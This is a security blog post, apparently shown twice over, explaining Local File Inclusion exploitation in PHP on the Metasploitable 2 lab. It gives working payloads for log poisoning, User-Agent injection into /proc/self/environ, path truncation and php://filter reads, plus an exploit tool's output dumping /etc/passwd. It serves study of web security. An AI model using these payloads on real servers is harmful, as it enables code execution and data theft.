Hello,
Today, I played a bit with Metasploitable 2.
It is really easy to root, so that's not the interest of this blog post.
Anyhow, I played a bit around and I ended up coding a basic LFI exploit tool.
So yet another post on LFI exploitation ...
LFI stands for Local File Inclusion.
It is a vulnerability that allows you to include local files.
Many people do think that it's not really dangerous as it only includes LOCAL files.
Unfortunately (depending on which side of the barrier you are ...), it is false, you can execute code through a LFI.
By including local files.
Yes, local files :).
These are the well-known techniques for LFI:
- apache logs
- /proc/self/environ
- php://input
- NULL Byte Injection
- path truncation
- directory traversal
- PHP filters
- image inclusion with PHP code
Now, these are only readable by proper users.
You'd basically inject PHP Code through the GET requests:
This would leave PHP code in the logs.
Then executing the PHP code is as simple as:
Code execution if there is no proper rights on the logs (some old systems remain).
This file is interesting as it stores stuffs like your USER-AGENT and whatsoever.
So, if you change your User-Agent to
Yes, code execution!
Say you have the following code:
Well, you can get rid of the '.php' extension using that trick.
Just append or looooooots of . or /., this will get normalized and voila no more extension.
NULL Byte poisoning doesn't work for PHP >= 5.3.4 as it's been fixed.
Reverse path truncation is mostly the same, just the ../ is before the file name.
This doesn't work if you have a prefix such as here:
You exploit it using this request for instance:
As you guessed, the PHP filter is
This one is about appending PHP code in an image.
Using the image in the LFI allows you to inject PHP code : the PHP interpreter interprets anything as code as long as it's in <?php ?>.
If you have a non exploitable LFI with /proc/self/environ or apaches logs and you don't have an extension concatenation, this can allow you to exploit it if you are able to upload images.
Let's say you have PHPBB and PhpLdapAdmin 1.1.0.5.
Well, you can upload an image using PHPBB then exploit the LFI in PhpLdapAdmin using the directory traversal trick => code execution.
I wrote a basic LFI exploiter that uses PHP filter or /proc/self/environ tricks.
You can get it at LFI exploit tool .
The code isn't clean and it needs tons of improvement before being really a usable tool. I plan on improving it on a need to basis.The cookie functionality is not implemented yet, it is just a placeholder for now.
You can test it on multilidae on Metasploitable 2. I haven't tested it somewhere else yet.
Example of utilisation (this is on metasploitable 2):
These aren't only information leaks vulnerabilities.
That's all for today.
Cheers,
m_101
- Basics on file inclusion : http://www.blackhatlibrary.net/File_Inclusion
- PhpLdapAdmin LFI : http://www.exploit-db.com/exploits/10410/
- path truncation part 1 : http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
- path truncation part 2 : http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/
Today, I played a bit with Metasploitable 2.
It is really easy to root, so that's not the interest of this blog post.
Anyhow, I played a bit around and I ended up coding a basic LFI exploit tool.
So yet another post on LFI exploitation ...
So what is LFI?
LFI stands for Local File Inclusion.
It is a vulnerability that allows you to include local files.
Many people do think that it's not really dangerous as it only includes LOCAL files.
Unfortunately (depending on which side of the barrier you are ...), it is false, you can execute code through a LFI.
So, how do you exploit it?
By including local files.
Yes, local files :).
These are the well-known techniques for LFI:
- apache logs
- /proc/self/environ
- php://input
- NULL Byte Injection
- path truncation
- directory traversal
- PHP filters
- image inclusion with PHP code
Apache logs
These were publicly accessible in old distros.Now, these are only readable by proper users.
You'd basically inject PHP Code through the GET requests:
http://victim/<?php system ('id'); ?>
This would leave PHP code in the logs.
Then executing the PHP code is as simple as:
http://victim/?page=/var/log/apache2/access_log
Code execution if there is no proper rights on the logs (some old systems remain).
/proc/self/environ
This file is interesting as it stores stuffs like your USER-AGENT and whatsoever.
So, if you change your User-Agent to
<?php system ('id'); ?>and use this:
http://victim/?page=/proc/self/environ
Yes, code execution!
php://input
Ok, this one execute PHP Code included into the POST DATA.NULL byte injection and path truncation
This one is pretty neat.Say you have the following code:
<?php include ($_GET['page'] . '.php'); ?>
Well, you can get rid of the '.php' extension using that trick.
Just append or looooooots of . or /., this will get normalized and voila no more extension.
NULL Byte poisoning doesn't work for PHP >= 5.3.4 as it's been fixed.
Reverse path truncation is mostly the same, just the ../ is before the file name.
PHP filters
This vulnerability is mainly for leaking files (.php and others).This doesn't work if you have a prefix such as here:
<?php include ($prefix + $_GET['page'] + '.php'); ?>
You exploit it using this request for instance:
http://victim/?page=php://filter/read=convert.base64-encode/resource=index.php
As you guessed, the PHP filter is
php://filter/read=convert.base64-encode/resource=.
image with PHP code
This one is about appending PHP code in an image.
Using the image in the LFI allows you to inject PHP code : the PHP interpreter interprets anything as code as long as it's in <?php ?>.
If you have a non exploitable LFI with /proc/self/environ or apaches logs and you don't have an extension concatenation, this can allow you to exploit it if you are able to upload images.
Let's say you have PHPBB and PhpLdapAdmin 1.1.0.5.
Well, you can upload an image using PHPBB then exploit the LFI in PhpLdapAdmin using the directory traversal trick => code execution.
Exploit
I wrote a basic LFI exploiter that uses PHP filter or /proc/self/environ tricks.
You can get it at LFI exploit tool .
The code isn't clean and it needs tons of improvement before being really a usable tool. I plan on improving it on a need to basis.
You can test it on multilidae on Metasploitable 2. I haven't tested it somewhere else yet.
Example of utilisation (this is on metasploitable 2):
$ ./exploit-lfi.py -h usage: exploit-lfi.py [-h] --url URL [--action ACTION] --option OPTION [--replace REPLACE] [--cookie COOKIE] Exploit LFI optional arguments: -h, --help show this help message and exit --url URL, -u URL URL to attack --action ACTION, -a ACTION exec or read (default) --option OPTION, -o OPTION Action argument --replace REPLACE, -r REPLACE string to replace --cookie COOKIE, -c COOKIE Cookie $ ./exploit-lfi.py -u 'http://192.168.56.107/mutillidae/index.php?page=show-log.php' -o 'cat /etc/passwd' [+] Checking vulnerability Test url : http://192.168.56.107/mutillidae/index.php?page=whatever& Is vulnerable with param page! [+] Found vulnerability, new URL : http://192.168.56.107/mutillidae/index.php?page=PAYLOAD& [+] Searching for root path root : ../../../ [+] New URL : http://192.168.56.107/mutillidae/index.php?page=../../../PAYLOAD& [+] Testing : {'path': '/proc/self/environ', 'type': 'header'} http://192.168.56.107/mutillidae/index.php?page=../../..//proc/self/environ& root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh dhcp:x:101:102::/nonexistent:/bin/false syslog:x:102:103::/home/syslog:/bin/false klog:x:103:104::/home/klog:/bin/false sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash bind:x:105:113::/var/cache/bind:/bin/false postfix:x:106:115::/var/spool/postfix:/bin/false ftp:x:107:65534::/home/ftp:/bin/false postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false distccd:x:111:65534::/:/bin/false user:x:1001:1001:just a user,111,,:/home/user:/bin/bash service:x:1002:1002:,,,:/home/service:/bin/bash telnetd:x:112:120::/nonexistent:/bin/false proftpd:x:113:65534::/var/run/proftpd:/bin/false statd:x:114:65534::/var/lib/nfs:/bin/false snmp:x:115:65534::/var/lib/snmp:/bin/false
Conclusion
As you can see in this introduction, code execution is quite possible with a LFI.These aren't only information leaks vulnerabilities.
That's all for today.
Cheers,
m_101
Updates
- 18/12/2013 : the LFI exploit tool I wrote has been moved to its own repository : https://github.com/m101/lfipwn/ and cookie functionality does work.
- 18/12/2013 : the LFI exploit tool I wrote has been moved to its own repository : https://github.com/m101/lfipwn/ and cookie functionality does work.
References
- Basics on file inclusion : http://www.blackhatlibrary.net/File_Inclusion
- PhpLdapAdmin LFI : http://www.exploit-db.com/exploits/10410/
- path truncation part 1 : http://www.ush.it/2009/02/08/php-filesystem-attack-vectors/
- path truncation part 2 : http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/
Aucun commentaire :
Enregistrer un commentaire